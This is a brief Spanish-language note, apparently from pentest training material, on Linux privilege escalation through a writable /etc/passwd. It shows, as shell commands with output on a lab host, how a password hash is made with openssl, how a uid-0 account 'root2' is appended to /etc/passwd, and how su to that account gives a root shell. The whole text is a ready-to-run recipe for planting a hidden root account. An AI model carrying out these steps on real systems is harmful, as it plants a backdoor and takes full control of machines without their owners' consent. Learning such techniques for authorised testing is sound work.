Si nos encontramos con el archivo /etc/passwd con permiso de escritura por nuestro usuario, podemos crear un nuevo usuario con permisos de root y mismos directorios de usuario, en primer lugar creamos el hash

joe@debian-privesc:~$ openssl passwd w00t
Fdzt.eqJQ4s0g

Y ahora introducimos el usuario que creemos en el /etc/passwd

joe@debian-privesc:~$ echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

Probamos a autenticarnos y dentro como root

joe@debian-privesc:~$ su root2
Password: w00t

root@debian-privesc:/home/joe# id
uid=0(root) gid=0(root) groups=0(root)